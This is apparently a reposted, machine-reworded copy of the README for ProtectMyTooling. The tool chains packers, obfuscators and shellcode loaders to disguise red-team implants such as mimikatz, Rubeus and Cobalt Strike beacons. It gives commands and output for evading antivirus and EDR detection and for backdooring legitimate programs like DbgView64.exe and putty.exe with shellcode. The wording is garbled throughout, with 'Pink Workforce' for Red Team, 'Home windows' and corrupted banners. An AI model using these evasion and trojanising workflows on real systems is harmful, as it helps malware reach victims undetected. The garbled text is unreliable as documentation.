Wednesday, October 26, 2022
HomeHackerMulti-Packer Wrapper Letting Us Daisy-Chain Varied Packers, Obfuscators And Different Pink Workforce...

Multi-Packer Wrapper Letting Us Daisy-Chain Varied Packers, Obfuscators And Different Pink Workforce Oriented Weaponry


Script that wraps round multitude of packers, protectors, obfuscators, shellcode loaders, encoders, turbines to supply complicated protected Pink Workforce implants. Your excellent companion in Malware Growth CI/CD pipeline, serving to watermark your artifacts, acquire IOCs, backdoor and extra.

With ProtectMyTooling you may shortly obfuscate your binaries with out having to fret about clicking by all of the Dialogs, interfaces, menus, creating initiatives to obfuscate a single binary, clicking by all of the choices obtainable and losing time about all that nonsense. It takes you straight to the purpose – to obfuscate your device.

Purpose is to supply essentially the most handy interface doable and permit to leverage a daisy-chain of a number of packers mixed on a single binary.

The above instance will firstly move mimikatz.exe to the Hyperion for obfuscation, after which the end result will likely be supplied to UPX for compression. Ensuing with UPX(Hyperion(file))

This device was designed to work on Home windows, as most packers natively goal that platform.

Some options may fit nonetheless on Linux simply fantastic, nonetheless that help isn’t totally examined, please report bugs and points.

For ScareCrow packer to run on Home windows 10, there must be WSL put in and bash.exe obtainable (in %PATH%). Then, in WSL one must have golang put in in model no less than 1.16:

To plug-in supported obfuscators, change default choices or level ProtectMyTooling to your obfuscator executable path, you will want to regulate configProtectMyTooling.yaml configuration file.

There’s additionally configsample-full-config.yaml file containing all of the obtainable choices for all of the supported packers, serving as reference level.

Earlier than ProtectMyTooling‘s first use, it’s important to regulate program’s YAML configuration file ProtectMyTooling.yaml. The order of parameters processal is following:

There, supported packer paths and choices shall be set to allow.

Utilization could be very easy, all it takes is to move the title of obfuscator to decide on, enter and output file paths:

C:> py ProtectMyTooling.py confuserex Rubeus.exe Rubeus-obf.exe

::::::::::.:::::::.. ... :::::::::::.,:::::: .,-::::::::::::::::
`;;;```.;;;;;;``;;;; .;;;;;;;;;;;;;;;''';;;;'''',;;;'````;;;;;;;;''''
`]]nnn]]' [[[,/[[[' ,[[ [[, [[ [[cccc [[[ [[
$$$"" $$$$$$c $$$, $$$ $$ $$"""" $$$ $$
888o 888b "88bo"888,_ _,88P 88, 888oo,_`88bo,__,o, 88,
. YMMMb :.-:.MM ::-. "YMMMMMP" MMM """"YUMMM"YUMMMMMP" MMM
;;,. ;;;';;. ;;;;'
[[[[, ,[[[[, '[[,[[['
$$$$$$$$"$$$ c$$"
888 Y88" 888o,8P"`
::::::::::::mM... ... ::: :::::. :::. .,-:::::/
;;;;;;;;'''.;;;;;;;. .;;;;;;;. ;;; ;;`;;;;, `;;,;;-'````'
[[ ,[[ [[,[[ [[,[[[ [[[ [[[[[. '[[[[ [[[[[[/
$$ $$$, $$$$$, $$$$$' $$$ $$$ "Y$c$"$$c. "$$
88, "888,_ _,88" 888,_ _,88o88oo,._888 888 Y88`Y8bo,,,o88o
MMM "YMMMMMP" "YMMMMMP"""""YUMMMMM MMM YM `'YMUP"YMM

Red Team implants protection swiss knife.

Multi-Packer wrapping around multitude of packers, protectors, shellcode loaders, encoders.
Mariusz Banach / mgeeky '20-'22, <[email protected]>
v0.15

[.] Processing x86 file: "Rubeus.exe"
[.] Producing output of ConfuserEx(<file>)...

[+] SUCCEEDED. Authentic file dimension: 417280 bytes, new file dimension ConfuserEx(<file>): 756224, ratio: 181.23%

One may obfuscate the file and instantly try to launch it (additionally with provided non-compulsory parameters) to make sure it runs fantastic with choices -r --cmdline CMDLINE:

Situation 3: Complicated malware obfuscation with watermarking and IOCs assortment

Beneath use case takes beacon.exe on enter and feeds it consecutively into CallObf -> UPX -> Hyperion packers.

Then it can inject specified fooobar watermark to the ultimate generated output artifact’s DOS Stub in addition to modify that artifact’s checksum with worth 0xAABBCCDD.

Lastly, ProtectMyTooling will seize all IOCs (md5, sha1, sha256, imphash, and different metadata) and save them in auxiliary CSV file. That file can be utilized for IOC matching as engagement unfolds.

PS> py .ProtectMyTooling.py callobf,upx,hyperion beacon.exe beacon-obf.exe -i -I operation_chimera -w dos-stub=fooobar -w checksum=0xaabbccdd

[...]

[.] Processing x64 file: "beacon.exe"
[>] Producing output of CallObf(<file>)...

[.] Earlier than obfuscation file's PE IMPHASH: 17b461a082950fc6332228572138b80c
[.] After obfuscation file's PE IMPHASH: 378d9692fe91eb54206e98c224a25f43
[>] Producing output of UPX(CallObf(<file>))...

[>] Producing output of Hyperion(UPX(CallObf(<file>)))...

[+] Setting PE checksum to 2864434397 (0xaabbccdd)
[+] Efficiently watermarked ensuing artifact file.
[+] IOCs written to: beacon-obf-ioc.csv

[+] SUCCEEDED. Authentic file dimension: 288256 bytes, new file dimension Hyperion(UPX(CallObf(<file>))): 175616, ratio: 60.92%

Produced IOCs proof CSV file will look as follows:

timestamp,filename,creator,context,remark,md5,sha1,sha256,imphash
2022-06-10 03:15:52,beacon.exe,[email protected],Enter File,check,dcd6e13754ee753928744e27e98abd16,298de19d4a987d87ac83f5d2d78338121ddb3cb7,0a64768c46831d98c5667d26dc731408a5871accefd38806b2709c66cd9d21e4,17b461a082950fc6332228572138b80c
2022-06-10 03:15:52,y49981l3.bin,[email protected],Obfuscation artifact: CallObf(<file>),check,50bbce4c3cc928e274ba15bff0795a8c,15bde0d7fbba1841f7433510fa9aa829f8441aeb,e216cd8205f13a5e3c5320ba7fb88a3dbb6f53ee8490aa8b4e1baf2c6684d27b,378d9692fe91eb54206e98c224a25f43
2022-06-10 03:15:53,nyu2rbyx.bin,[email protected],Obfuscation artifact: UPX(CallObf(<file>)),check,4d3584f10084cded5c6da7a63d42f758,e4966576bdb67e389ab1562e24079ba9bd565d32,97ba4b17c9bd9c12c06c7ac2dc17428d509b64fc8ca9e88ee2de02c36532be10,9aebf3da4677af9275c461261e5abde3
2022-06-10 03:15:53,beacon-obf.exe,[email protected],Obfuscation artifact: Hyperion(UPX(CallObf(<file>))),te st,8b706ff39dd4c8f2b031c8fa6e3c25f5,c64aad468b1ecadada3557cb3f6371e899d59790,087c6353279eb5cf04715ef096a18f83ef8184aa52bc1d5884e33980028bc365,a46ea633057f9600559d5c6b328bf83d
2022-06-10 03:15:53,beacon-obf.exe,[email protected],Output obfuscated artifact,check,043318125c60d36e0b745fd38582c0b8,a7717d1c47cbcdf872101bd488e53b8482202f7f,b3cf4311d249d4a981eb17a33c9b89eff656fff239e0d7bb044074018ec00e20,a46ea633057f9600559d5c6b328bf83d

Supported Packers

ProtectMyTooling was designed to help not solely Obfuscators/Packers but additionally all form of builders/turbines/shellcode loaders usable from the command line.

In the meanwhile, program helps numerous Industrial and Open-Supply packers/obfuscators. These Open-Supply ones are bundled throughout the challenge. Industrial ones would require consumer to buy the product and configure its location in ProtectMyTooling.yaml file to level the script the place to seek out them.

  1. Amber – Reflective PE Packer that takes EXE/DLL on enter and produces EXE/PIC shellcode
  2. AsStrongAsFuck – A console obfuscator for .NET assemblies by Charterino
  3. CallObfuscator – Obfuscates particular home windows apis with completely different apis.
  4. ConfuserEx – Widespread .NET obfuscator, forked from Martin Karing
  5. Donut – Widespread PE loader that takes EXE/DLL/.NET on enter and produces a PIC shellcode
  6. Enigma – A robust system designed for complete safety of executable recordsdata
  7. Hyperion – runtime encrypter for 32-bit and 64-bit transportable executables. It’s a reference implementation and bases on the paper “Hyperion: Implementation of a PE-Crypter”
  8. IntelliLock – combines sturdy license safety, extremely adaptable licensing performance/schema with dependable meeting safety
  9. InvObf – Obfuscates Powershell scripts with Invoke-Obfuscation (by Daniell Bohannon)
  10. LoGiC.NET – A extra superior free and open .NET obfuscator utilizing dnlib by AnErrupTion
  11. Mangle – Takes enter EXE/DLL file and produces output one with cloned certificates, eliminated Golang-specific IoCs and bloated dimension. By Matt Eidelberg (@Tyl0us).
  12. MPRESS – MPRESS compressor by Vitaly Evseenko. Takes enter EXE/DLL/.NET/MAC-DARWIN (x86/x64) and compresses it.
  13. NetReactor – Unmatched .NET code safety system which fully stops anybody from decompiling your code
  14. NetShrink – an exe packer aka executable compressor, utility password protector and digital DLL binder for Home windows & Linux .NET functions.
  15. Nimcrypt2 – Generates Nim loader operating enter .NET, PE or Uncooked Shellcode. Authored by (@icyguider)
  16. NimPackt-v1 – Takes Shellcode or .NET Executable on enter, produces EXE or DLL loader. Dropped at you by Cas van Cooten (@chvancooten)
  17. NimSyscallPacker – Takes PE/Shellcode/.NET executable and generates strong Nim+Syscalls EXE/DLL loader. Sponsorware authored by (@S3cur3Th1sSh1t)
  18. Packer64 – wrapper round John Adams’ Packer64
  19. pe2shc – Converts PE right into a shellcode. By yours actually @hasherezade
  20. peCloak – A Multi-Move Encoder & Heuristic Sandbox Bypass AV Evasion Device
  21. peresed – Makes use of “peresed” from avast/pe_tools to take away all current PE Assets and signature (consider Mimikatz icon).
  22. ScareCrow – EDR-evasive x64 shellcode loader that produces DLL/CPL/XLL/JScript/HTA artifact loader
  23. sgn – Shikata ga nai (仕方がない) encoder ported into go together with a number of enhancements. Takes shellcode, produces encoded shellcode
  24. SmartAssembly – obfuscator that helps defend your utility towards reverse-engineering or modification, by making it tough for a third-party to entry your supply code
  25. sRDI – Convert DLLs to place impartial shellcode. Authored by: Nick Landers, @monoxgas
  26. Themida – Superior Home windows software program safety system
  27. UPX – a free, transportable, extendable, high-performance executable packer for a number of executable codecs.
  28. VMProtect – protects code by executing it on a digital machine with non-standard structure that makes it extraordinarily tough to investigate and crack the software program

You may shortly record supported packers utilizing -L choice (desk columns are chosen relying on Terminal width, the broader the extra info revealed):

C:> py ProtectMyTooling.py -L
[...]

Pink Workforce implants safety swiss knife.

Multi-Packer wrapping round multitude of packers, protectors, shellcode loaders, encoders.
Mariusz Banach / mgeeky '20-'22, <[email protected]>
v0.15

+----+----------------+-------------+-----------------------+-----------------------------+------------------------+--------------------------------------------------------+
| # | Title | Kind | Licensing | Enter | Output | Writer |
+----+----------------+-------------+-----------------------+-----------------------------+------------------------+--------------------------------------------------------+
| 1 | amber | open-source | Shellcode Loader | PE | EXE, Shellcode | Ege B alci |
| 2 | asstrongasfuck | open-source | .NET Obfuscator | .NET | .NET | Charterino, klezVirus |
| 3 | backdoor | open-source | Shellcode Loader | Shellcode | PE | Mariusz Banach, @mariuszbit |
| 4 | callobf | open-source | PE EXE/DLL Protector | PE | PE | Mustafa Mahmoud, @d35ha |
| 5 | confuserex | open-source | .NET Obfuscator | .NET | .NET | mkaring |
| 6 | donut-packer | open-source | Shellcode Converter | PE, .NET, VBScript, JScript | Shellcode | TheWover |
| 7 | enigma | business | PE EXE/DLL Protector | PE | PE | The Enigma Protector Builders Workforce |
| 8 | hyperion | open-source | PE EXE/DLL Protector | PE | PE | nullsecurity crew |
| 9 | intellilock | business | .NET Obfuscator | PE | PE | Eziriz |
| 10 | invobf | open-source | Powershell Obfuscator | Powershell | Powershell | Daniel Bohannon |
| 11 | logicnet | open-source | .NET Obfuscator | .NET | .NET | AnErrupTion, klezVirus |
| 12 | mangle | open-source | Executable Signing | PE | PE | Matt Eidelberg (@Tyl0us) |
| 13 | mpress | freeware | PE EXE/DLL Compressor | PE | PE | Vitaly Evseenko |
| 14 | netreactor | business | .NET Obfuscator | .NET | .NET | Eziriz |
| 15 | netshrink | open-source | .NET Obfuscator | .NET | .NET | Bartosz Wójcik |
| 16 | nimcrypt2 | open-source | Shellcode Loader | PE, .NET, Shellcode | PE | @icyguider |
| 17 | nimpackt | open-source | Shellcode Loader | .NET, Shellcode | PE | Cas van Cooten (@chvancooten) |
| 18 | nimsyscall | sponsorware | Shellcode Loader | PE, .NET, Shellcode | PE | @S3cur3Th1sSh1t |
| 19 | packer64 | open-source | PE EXE/DLL Compressor | PE | PE | John Adams, @jadams |
| 20 | pe2shc | open-source | Shellcode Converter | PE | Shellcode | @hasherezade |
| 21 | pecloak | open-source | PE EXE/DLL Protector | PE | PE | Mike Czumak, @SecuritySift, buherator / v-p-b |
| 22 | peresed | open-source | PE EXE/DLL Protector | PE | PE | Martin Vejnár, Avast |
| 23 | scarecrow | open-source | Shellcode Loader | Shellcode | DLL, JScript, CPL, XLL | Matt Eidelberg (@Tyl0us) |
| 24 | sgn | open -source | Shellcode Encoder | Shellcode | Shellcode | Ege Balci |
| 25 | smartassembly | business | .NET Obfuscator | .NET | .NET | Pink-Gate |
| 26 | srdi | open-source | Shellcode Encoder | DLL | Shellcode | Nick Landers, @monoxgas |
| 27 | themida | business | PE EXE/DLL Protector | PE | PE | Oreans |
| 28 | upx | open-source | PE EXE/DLL Compressor | PE | PE | Markus F.X.J. Oberhumer, László Molnár, John F. Reiser |
| 29 | vmprotect | business | PE EXE/DLL Protector | PE | PE | vmpsoft |
+----+----------------+-------------+-----------------------+-----------------------------+------------------------+--------------------------------------------------------+

Above are the packers which can be supported, however that does not imply that you’ve got them configured and able to use. To organize their utilization, you could first provide needed binaries to the contrib listing after which configure your YAML file accordingly.

Artifact watermarking & IOC assortment

This program is meant for skilled Pink Groups and is ideal for use in a typical implant-development CI/CD pipeline. As a crimson teamer I am all the time anticipated to ship respectable high quality record of IOCs matching again to all of my implants in addition to I discover it important to watermark all my implants for bookkeeping, attribution and traceability functions.

To accommodate these necessities, ProtectMyTooling brings primary help for them.

Artifact Watermarking

ProtectMyTooling can apply watermarks after obfuscation rounds just by utilizing --watermark choice.:

py ProtectMyTooling [...] -w dos-stub=fooooobar -w checksum=0xaabbccdd -w part=.coco,ALLYOURBASEAREBELONG

There’s additionally a standalone strategy, included in RedWatermarker.py script.

It takes executable artifact on enter and accepts few parameters denoting the place to inject a watermark and what worth shall be inserted.

Instance run will set PE Checksum to 0xAABBCCDD, inserts foooobar to PE file’s DOS Stub (bytes containing This program can’t be run…), appends bazbazbaz to file’s overlay after which create a brand new PE part named .coco append it to the tip of file and fill that part with preset marker.

py RedWatermarker.py beacon-obf.exe -c 0xaabbccdd -t fooooobar -e bazbazbaz -s .coco,ALLYOURBASEAREBELONG

Full watermarker utilization:

cmd> py RedWatermarker.py --help

;
ED.
,E#Wi
j. f#iE###G.
EW, .E#t E#fD#W;
E##j i#W, E#t t##L
E###D. L#D. E#t .E#Okay,
E#jG#W; :Okay#Wfff; E#t j##f
E#t t##f i##WLLLLtE#t :E#Okay:
E#t :Okay#E: .E#L E#t t##L
E#KDDDD###i f#E: E#t .D#W; ,; G: ,;
E#f,t#Wi,,, ,WW; E#tiW#G. f#i j. j. E#, : f#i j.
E#t ;#W: ; .D#;E#Okay##i .. GEEEEEEEL .E#t EW, .. : .. EW, E#t .GE .E#t EW,
DWi ,Okay.DL ttE##D. ;W, ,;;L#Okay;;. i#W, E##j ,W, .Et ;W, E##j E#t j#Okay; i#W, E##j
f. :Okay#L LWL E#t j##, t#E L#D. E###D. t##, ,W#t j##, E###D. E#GK#f L#D. E###D.
EW: ;W##L .E#f L: G###, t#E :Okay#Wfff; E#jG#W; L###, j###t G###, E#jG#W; E##D. :Okay#Wfff; E#jG#W;
E#t t#KE#L ,W#; :E####, t#E i##WLLLLt E#t t##f .E#j##, G#fE#t :E####, E#t t##f E##Wi i##WLLLLt E#t t##f
E#t f#D.L#L t#Okay: ;W#DG##, t#E .E#L E#t :Okay#E: ;WW; ##,:Okay#i E#t ;W#DG##, E#t :Okay#E:E#jL#D: .E#L E#t :Okay#E:
E#jG#f L#LL#G j###DW##, t#E f#E: E#KDDDD###i j#E. ##f#W, E#t j###DW##, E#KDDDD###E#t ,Okay#j f#E: E#KDDDD###i
E###; L###j G##i,,G##, t#E ,WW; E#f,t#Wi,,,.D#L ###Okay: E#t G##i,,G##, E#f,t#Wi,,E#t jD ,WW; E#f,t#Wi,,,
E#Okay: L#W; :Okay#Okay: L##, t#E .D#; E#t ;#W: :Okay#t ##D. E#t :Okay#Okay: L##, E#t ;#W: j#t .D#; E#t ;#W:
EG LE. ;##D. L##, fE tt DWi ,KK:... #G .. ;##D. L##, DWi ,KK: ,; tt DWi ,KK:
; ;@ ,,, .,, : j ,,, .,,

Watermark thy implants, observe them in VirusTotal
Mariusz Banach / mgeeky '22, (@mariuszbit)
<[email protected]>

utilization: RedWatermarker.py [options] <infile>

choices:
-h, --help present this assist message and exit

Required arguments:
infile Enter implant file

Elective arguments:
-C, --check Don't really inject watermark. Examine enter file if it incorporates specified watermarks.
-v, --verbose Verbose mode.
-d, --debug Debug mode.
-o PATH, --outfile PATH
Path the place to avoid wasting output file with watermark injected. If not given, will modify infile.

PE Executables Watermarking:
-t STR, --dos-stub STR
Insert watermark into PE DOS Stub (Th is program can't be run...).
-c NUM, --checksum NUM
Preset PE checksum with this worth (4 bytes). Should be quantity. Can begin with 0x for hex worth.
-e STR, --overlay STR
Append watermark to the file's Overlay (on the finish of the file).
-s NAME,STR, --section NAME,STR
Append a brand new PE part named NAME and insert watermark there. Part title have to be shorter than 8 characters. Part will likely be marked Learn-Solely, non-executable.

Presently solely PE recordsdata watermarking is supported, however sooner or later Workplace paperwork and different codecs are to be added as effectively.

IOCs Assortment

IOCs could also be collected by merely utilizing -i choice in ProtectMyTooling run.

They’re being collected on the following phases:

  • on the enter file
  • after every obfuscation spherical on an middleman file
  • on the ultimate output file

They’ll include following fields saved in type of a CSV file:

  • timestamp
  • filename
  • creator – fashioned as [email protected]
  • context – whether or not a file factors to an enter, output or middleman file
  • remark – worth adjusted by the consumer by -I worth choice
  • md5
  • sha1
  • sha256
  • imphash – PE Imports Hash, if obtainable
  • (TODO) typeref_hash – .NET TypeRef Hash, if obtainable

Ensuing will likely be a CSV file named outfile-ioc.csv saved aspect by aspect to generated output artifact. That file is written in APPEND mode, that means it can obtain all subsequent IOCs.

ProtectMyTooling makes use of my very own RedBackdoorer.py script which gives few strategies for backdooring PE executables. Assist comes as a devoted packer named backdoor. Instance utilization:

Takes Cobalt Strike shellcode on enter and encodes with SGN (Shikata Ga-Nai) then backdoors SysInternals DbgView64.exe then produces Amber EXE reflective loader

PS> py ProtectMyTooling.py sgn,backdoor,amber beacon64.bin dbgview64-infected.exe -B dbgview64.exe

::::::::::.:::::::.. ... :::::::::::.,:::::: .,-::::::::::::::::
`;;;```.;;;;;;``;;;; .;;;;;;;;;;;;;;;;;;;,;;;'````;;;;;;;;
`]]nnn]]' [[[,/[[[' ,[[ [[, [[ [[cccc [[[ [[
$$$"" $$$$$$c $$$, $$$ $$ $$"""" $$$ $$
888o 888b "88bo"888,_ _,88P 88, 888oo,_`88bo,__,o, 88,
. YMMMb :.-:.MM ::-. "YMMMMMP" MMM """"YUMMM"YUMMMMMP" MMM
;;,. ;;;';;. ;;;;'
[[[[, ,[[[[, '[[,[[['
$$$$$$$$"$$$ c$$"
888 Y88" 888o,8P"`
::::::::::::mM... ... ::: :::::. :::. .,-:::::/
;;;;;;;;.;;;;;;;. .;;;;;;;. ;;; ;;`;;;;, `;;,;;-'````'
[[ ,[[ [[,[[ [[,[[[ [[[ [[[[[. '[[[[ [[[[[[/
$$ $$$, $$$$$, $$$$$' $$$ $$$ "Y$c$"$$c. "$$
88, "888,_ _,88"888,_ _,88o88oo,._888 888 Y88`Y8bo,,,o88o
MMM "YMMMMMP" "YMMMMMP"""""YUMMMMM MMM YM `'YMUP"YMM

Red Team implants protection swiss knife.

Multi-Packer wrapping around multitude of packers, protectors, shellcode loaders, encoders.
Mariusz Banach / mgeeky '20-'22, <[email protected]>
v0.15

[.] Processing x64 file : beacon64.bin
[>] Producing output of sgn(<file>)...
[>] Producing output of backdoor(sgn(<file>))...
[>] Producing output of Amber(backdoor(sgn(<file>)))...

[+] SUCCEEDED. Authentic file dimension: 265959 bytes, new file dimension Amber(backdoor(sgn(<file>))): 1372672, ratio: 516.12%

Full RedBackdoorer utilization:

cmd> py RedBackdoorer.py --help

██▀███ ▓█████▓█████▄
▓██ ▒ ██▓█ ▀▒██▀ ██▌
▓██ ░▄█ ▒███ ░██ █▌
▒██▀▀█▄ ▒▓█ ▄░▓█▄ ▌
░██▓ ▒██░▒████░▒████▓
░ ▒▓ ░▒▓░░ ▒░ ░▒▒▓ ▒
░▒ ░ ▒░░ ░ ░░ ▒ ▒
░░ ░ ░ ░ &# 9617; ░
▄▄▄▄ ▄▄▄░ ░ ▄████▄ ██ ▄█▓█████▄ ▒█████ ▒█████ ██▀███ ▓█████ ██▀███
▓█████▄▒████▄ ░▒██▀ ▀█ ██▄█▒▒██▀ ██▒██▒ ██▒██▒ ██▓██ ▒ ██▓█ ▀▓██ ▒ ██▒
▒██▒ ▄█▒██ ▀█▄ ▒▓█ &#9 604;▓███▄░░██ █▒██░ ██▒██░ ██▓██ ░▄█ ▒███ ▓██ ░▄█ ▒
▒██░█▀ ░██▄▄▄▄██▒▓▓▄ ▄██▓██ █▄░▓█▄ ▒██ ██▒██ ██▒██▀▀█▄ ▒▓█ ▄▒██▀▀█▄
░▓█ ▀█▓▓█ ▓██▒ ▓███▀ ▒██▒ █░▒████▓░ ████▓▒ ░ ████▓▒░██▓ ▒██░▒████░██▓ ▒██▒
░▒▓███▀▒▒▒ ▓▒█░ ░▒ ▒ ▒ ▒▒ ▓▒▒▒▓ ▒░ ▒░▒░▒░░ ▒░▒░▒░░ ▒▓ ░▒▓░░ ▒░ ░ ▒▓ ░▒▓░
▒░▒ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░░ ▒ ▒ ░ ▒ ▒░ ░ ▒ ▒░ ░▒ ░ ▒░░ ░ ░ ░▒ ░ ▒░
░ ░ ░ ▒ &#9 617; ░ ░░ ░ ░ ░ ░░ ░ ░ ▒ ░ ░ ░ ▒ ░░ ░ ░ ░░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░ ░ ░

Your best PE backdooring companion.
Mariusz Banach / mgeeky '22, (@mariuszbit)
<[email protected]>

utilization: RedBackdoorer.py [options] <mode> <shellcode> <infile>

choices:
-h, --help present this assist message and exit

Required arguments:
mode PE Injection mode, see assist epilog for extra particulars.
shellcode Enter shellcode file
infile PE file to backdoor

Elective arguments:
-o PATH, --outfil e PATH
Path the place to avoid wasting output file with watermark injected. If not given, will modify infile.
-v, --verbose Verbose mode.

Backdooring choices:
-n NAME, --section-name NAME
If shellcode is to be injected into a brand new PE part, outline that part title. Part title should not be longer than 7 characters. Default: .qcsw
-i IOC, --ioc IOC Append IOC watermark to injected shellcode to facilitate implant monitoring.

Authenticode signature choices:
-r, --remove-signature
Take away PE Authenticode digital signature since its going to be invalidated anyway.

------------------

PE Backdooring <mode> consists of two comma-separated choices.
First one denotes the place to retailer shellcode, second find out how to run it:

<mode>

save,run
| |
| +---------- 1 - change AddressOfEntryPoint
| 2 - hijack branching instruction at Authentic Entry Level (jmp, name, ...)
| 3 - setup TLS callback
|
+-------------- 1 - retailer shellcode in the course of a code part
2 - append shellcode to the PE file in a brand new PE part
Instance:

py RedBackdoorer.py 1,2 beacon.bin putty.exe putty-infected.exe

There’s additionally a script that integrates ProtectMyTooling.py used as a wrapper round configured PE/.NET Packers/Protectors with a view to simply remodel enter executables into their protected and compressed output kinds after which add or use them from inside CobaltStrike.

The concept is to have an automatic strategy of defending the entire uploaded binaries or .NET assemblies utilized by execute-assembly and neglect about defending or obfuscating them manually earlier than every utilization. The additional advantage of an automatic strategy to rework executables is the flexibility to have the identical executable protected every time it is used, leading to distinctive samples launched heading in the right direction machines. That ought to properly deceive EDR/AV enterprise-wide IOC sweeps whereas searching for the identical artefact on completely different machines.

Moreover, the protected-execute-assembly command has the flexibility to search for assemblies of which solely title got in a preconfigured assemblies listing (set in dotnet_assemblies_directory setting).

To make use of it:

  1. Load CobaltStrike/ProtectMyTooling.cna in your Cobalt Strike.
  2. Go to the menu and setup all of the choices

  1. Then in your Beacon’s console you may have following instructions obtainable:
  • protected-execute-assembly – Executes an area, beforehand protected and compressed .NET program in-memory heading in the right direction.
  • protected-upload – Takes an enter file, protects it if its PE executable after which uploads that file to specified distant location.

Principally these instructions will open enter recordsdata, move the firstly to the CobaltStrike/cobaltProtectMyTooling.py script, which in flip calls out to ProtectMyTooling.py. As quickly because the binary will get obfuscated, it will likely be handed to your beacon for execution/importing.

Cobalt Strike associated Choices

This is an inventory of choices required by the Cobalt Strike integrator:

  • python3_interpreter_path – Specify a path to Python3 interpreter executable
  • protect_my_tooling_dir – Specify a path to ProtectMyTooling important listing
  • protect_my_tooling_config – Specify a path to ProtectMyTooling configuration file with numerous packers choices
  • dotnet_assemblies_directory – Specify native path .NET assemblies needs to be regarded for if not discovered by execute-assembly
  • cache_protected_executables – Allow to cache already protected executables and reuse them when wanted
  • protected_executables_cache_dir – Specify a path to a listing that ought to retailer cached protected executables
  • default_exe_x86_packers_chain – Native x86 EXE executables protectors/packers chain
  • default_exe_x64_packers_chain – Native x64 EXE executables protectors/packers chain
  • default_dll_x86_packers_chain – Native x86 DLL executables protectors/packers chain
  • default_dll_x64_packers_chain – Native x64 DLL executables protectors/packers chain
  • default_dotnet_packers_chain – .NET executables protectors/packers chain

Identified Points

  • ScareCrow could be very difficult to run from Home windows. What labored for me is following:
    1. Run on Home windows 10 and have WSL put in (bash.exe command obtainable in Home windows)
    2. Have golang put in in WSL at model 1.16+ (examined on 1.18)
    3. Be certain that to have PackerScareCrow.Run_ScareCrow_On_Windows_As_WSL = True set

Credit due & used expertise

  • All packer, obfuscator, converter, loader credit goes to their authors. This device is merely a wrapper round their expertise!

    • Hopefully none of them thoughts me including such wrappers. Ought to there be considerations – please attain out to me.
  • ProtectMyTooling additionally makes use of denim.exe by moloch– by some Nim-based packers.


TODO

  • Write customized PE injector and provide it as a “protector”
  • Add watermarking to different file codecs resembling Workplace paperwork, WSH scripts (VBS, JS, HTA) and containers
  • Add help for a couple of different Packers/Loaders/Turbines in upcoming future:

Disclaimer

Use of this device in addition to every other initiatives I am creator of for unlawful functions, unsolicited hacking, cyber-espionage is strictly prohibited. This and different instruments I distribute assist skilled Penetration Testers, Safety Consultants, Safety Engineers and different safety personnel in enhancing their buyer networks cyber-defence capabilities.
In no occasion shall the authors or copyright holders be answerable for any declare, damages or different legal responsibility arising from unlawful use of this software program.

If there are considerations, copyright points, threats posed by this software program or different inquiries – I’m open to collaborate in responsibly addressing them.

The device exposes useful interface for utilizing largely open-source or commercially obtainable packers/protectors/obfuscation software program, subsequently not introducing any instantly new threats to the cyber-security panorama as is.


☕Present Assist☕

This and different initiatives are final result of sleepless nights and loads of exhausting work. For those who like what I do and admire that I all the time give again to the group, Contemplate shopping for me a espresso (or higher a beer) simply to say thanks!


Writer

   Mariusz Banach / mgeeky, '20-'22
<mb [at] binary-offensive.com>
(https://github.com/mgeeky)



RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments